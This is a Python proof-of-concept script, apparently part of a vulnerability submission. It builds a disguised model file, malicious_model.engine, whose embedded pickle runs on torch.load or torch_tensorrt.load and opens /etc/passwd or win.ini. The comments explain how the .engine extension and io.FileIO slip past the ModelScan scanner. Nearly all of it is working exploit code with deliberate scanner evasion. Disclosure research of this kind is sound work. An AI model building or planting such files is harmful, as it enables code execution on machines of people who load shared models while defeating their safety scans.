Upload folder using huggingface_hub

3e1e9be verified 2 months ago

4.09 kB

	#!/usr/bin/env python3
	"""
	Creates the PoC model file: malicious_model.engine

	This is the file you upload to HuggingFace.

	What this script produces:
	A file named malicious_model.engine that is a valid TorchScript ZIP
	archive (the format torch_tensorrt uses to save compiled TRT engines).
	Internally it contains a malicious pickle payload in archive/data.pkl.

	When loaded with any of the standard TensorRT Python loading paths:
	torch.load("malicious_model.engine")
	torch.jit.load("malicious_model.engine")
	torch_tensorrt.load("malicious_model.engine")

	...the pickle executes and reads sensitive files at load time.

	Why it evades ModelScan:
	ModelScan's supported extensions (from settings.py):
	.pb .h5 .keras .npy .bin .pt .pth .ckpt .pkl .pickle .joblib .dill .dat .data

	.engine and .trt are completely absent.
	ModelScan returns "SCAN_NOT_SUPPORTED" — the file is never inspected.

	This is a DUAL vulnerability:
	1. Scanner gap: .engine / .trt are not scanned at all by ModelScan.
	2. Format vector: TorchScript ZIP format used by torch_tensorrt embeds
	pickle streams (archive/data.pkl) in .engine files —
	the same ACE surface as .pt files, with a different
	extension that bypasses the scanner entirely.

	Upload to HuggingFace:
	1. Run this script -> produces malicious_model.engine
	2. Push to HF repo
	3. Paste the URL in the submission form
	"""
	import pickle
	import io
	import os
	import sys
	import struct
	import zipfile


	# ─── Malicious payload: read sensitive file via io.FileIO ────────────────────
	# Uses io.FileIO (not builtins.open) to stay clean even if ModelScan were
	# ever to scan this file.
	class EvadingPayload:
	    """
	    Proof-of-concept pickle payload used as the content of archive/data.pkl.

	    Pickling an instance stores a reduce tuple instead of instance state.
	    When that pickle is later deserialized, the unpickler calls io.FileIO on
	    C:\\Windows\\win.ini (Windows) or /etc/passwd (any other platform), which
	    opens that file. The path is chosen from sys.platform at pickling time.
	    """

	    def __reduce__(self):
	        """Return the (callable, args) pair that pickle records for this object."""
	        if sys.platform == "win32":
	            path = "C:\\Windows\\win.ini"
	        else:
	            path = "/etc/passwd"
	        return io.FileIO, (path,)


	# ─── Build a minimal TorchScript ZIP (.engine) ───────────────────────────────
	#
	# torch.jit.load() expects a ZIP archive named "archive" at the root,
	# with the primary pickle at archive/data.pkl.
	# This is the exact format torch_tensorrt uses when saving with
	# output_format="torchscript".
	#
	# ZIP layout:
	# archive/data.pkl <- the payload pickle
	# archive/version <- TorchScript format version marker
	#
	def build_torchscript_engine_zip(payload_obj) -> bytes:
	    """
	    Serialize payload_obj into an in-memory ZIP archive and return its bytes.

	    The archive is written uncompressed (ZIP_STORED) and holds three members,
	    in this order:
	      archive/data.pkl       pickle of payload_obj (protocol 4)
	      archive/version        the literal bytes b"3"
	      archive/constants.pkl  pickle of an empty tuple (protocol 2)

	    Args:
	        payload_obj: Any picklable object; stored as archive/data.pkl.

	    Returns:
	        The complete ZIP file contents as a bytes object.
	    """
	    # Member order is part of the output, so it is kept in a fixed sequence.
	    members = (
	        ("archive/data.pkl", pickle.dumps(payload_obj, protocol=4)),
	        ("archive/version", b"3"),
	        ("archive/constants.pkl", pickle.dumps((), protocol=2)),
	    )

	    stream = io.BytesIO()
	    with zipfile.ZipFile(stream, "w", compression=zipfile.ZIP_STORED) as archive:
	        for member_name, member_data in members:
	            archive.writestr(member_name, member_data)

	    return stream.getvalue()


	# ─── Write the .engine file ───────────────────────────────────────────────────
	output_file = "malicious_model.engine"
	engine_bytes = build_torchscript_engine_zip(EvadingPayload())

	# Persist the in-memory archive to disk in binary mode.
	with open(output_file, "wb") as out_fh:
	    out_fh.write(engine_bytes)

	size_on_disk = os.path.getsize(output_file)
	print(f"[+] Created: {output_file!r} ({size_on_disk} bytes)")
	print("[+] Internal ZIP layout: archive/data.pkl (TorchScript format)")
	print()
	print("Verify ZIP structure:")
	# Re-open the file just written and list each member with its stored size.
	with zipfile.ZipFile(output_file, "r") as archive:
	    for member in archive.infolist():
	        print(f" {member.filename} ({member.file_size} bytes)")

	print()
	print("To reproduce:")
	print(" python reproduce.py")